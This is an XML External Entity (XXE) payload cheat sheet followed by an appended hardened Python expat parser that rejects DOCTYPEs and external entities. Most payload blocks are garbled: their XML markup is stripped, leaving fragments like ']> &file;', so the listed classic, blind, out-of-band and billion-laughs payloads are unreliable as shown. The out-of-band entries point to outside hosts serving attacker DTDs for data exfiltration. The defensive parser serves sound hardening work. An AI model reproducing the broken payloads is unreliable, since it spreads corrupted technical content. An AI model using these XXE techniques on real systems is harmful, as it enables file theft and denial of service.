# XML External Entity

An XML External Entity (XXE) attack is a type of attack against an application that parses XML input.

## Exploit

Basic Test

```
]> John &example;
```

Classic XXE

```
]> &file;
```

Classic XXE Base64 encoded

```
%init; ]>
```

PHP Wrapper inside XXE

```
]> Jean &xxe; Dupont 00 11 22 33 44 42 rue du CTF 75000 Paris
```

Denial of Service - Billion Laughs Attack

```
]> &a4;
```

Blind XXE

```
] > &callhome;
```

XXE OOB Attack (Yunusov, 2013)

```
&send;

File stored on http://publicServer.com/parameterEntity_oob.dtd
"> %all;
```

XXE OOB with DTD and PHP filter

```
%sp; %param1; ]> &exfil;

File stored on http://92.222.81.2/dtd.xml
">
```

XXE Inside SOAP

```
%dtd;]>]]>
```

## Thanks to

* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
* https://gist.github.com/staaldraad/01415b990939494879b4
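Every payload class listed above (classic, blind, OOB, parameter-entity DTD fetch, billion laughs) depends on the parser honouring a DOCTYPE and dereferencing entities. The hardened parser below is an added example, not code from the page or from the cheat-sheet project: it uses only Python's standard-library expat binding, refuses any DOCTYPE, never parses parameter entities, and refuses external entity references as defence in depth. The two sample documents and the `file:///placeholder/path` system identifier are constructed for this example.

```python
"""Hardened XML parsing for untrusted input (added example, not from the page)."""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when the input carries a DTD construct this parser refuses."""


def parse_untrusted(data: bytes) -> dict:
    """Parse XML into a {tag: text} dict while refusing every DTD feature XXE needs."""
    parser = expat.ParserCreate()
    # Never read or expand parameter entities (blocks remote DTD fetch and %param; chains).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # No DOCTYPE means no <!ENTITY> declarations at all: this alone stops
        # classic, blind and OOB XXE as well as entity-expansion (billion laughs).
        raise UnsafeXML("DOCTYPE is not accepted in untrusted input")

    def reject_external(context, base, sysid, pubid):
        # Defence in depth: even if a DTD were ever allowed, never dereference
        # an external entity (file://, http://, php:// wrappers, ...).
        raise UnsafeXML("external entity reference refused: %r" % (sysid,))

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external

    result, stack = {}, []
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()

    def collect_text(chunk):
        # Character data may arrive in several chunks; append to the current element.
        if stack:
            result[stack[-1]] = result.get(stack[-1], "") + chunk

    parser.CharacterDataHandler = collect_text
    parser.Parse(data, True)  # raises UnsafeXML or expat.ExpatError on bad input
    return result


# Constructed samples; the SYSTEM identifier below is a placeholder, not a real target.
SAMPLE_BENIGN = b"<root><name>John</name></root>"
SAMPLE_XXE = (b'<?xml version="1.0"?>'
              b'<!DOCTYPE data [<!ENTITY file SYSTEM "file:///placeholder/path">]>'
              b"<data>&file;</data>")


def is_rejected(data: bytes) -> bool:
    """True when the hardened parser refuses the document as unsafe."""
    try:
        parse_untrusted(data)
    except UnsafeXML:
        return True
    return False
```

Libraries such as lxml expose the same controls (`resolve_entities=False`, `no_network=True`, `load_dtd=False`), and defusedxml wraps the standard-library parsers with equivalent rejections.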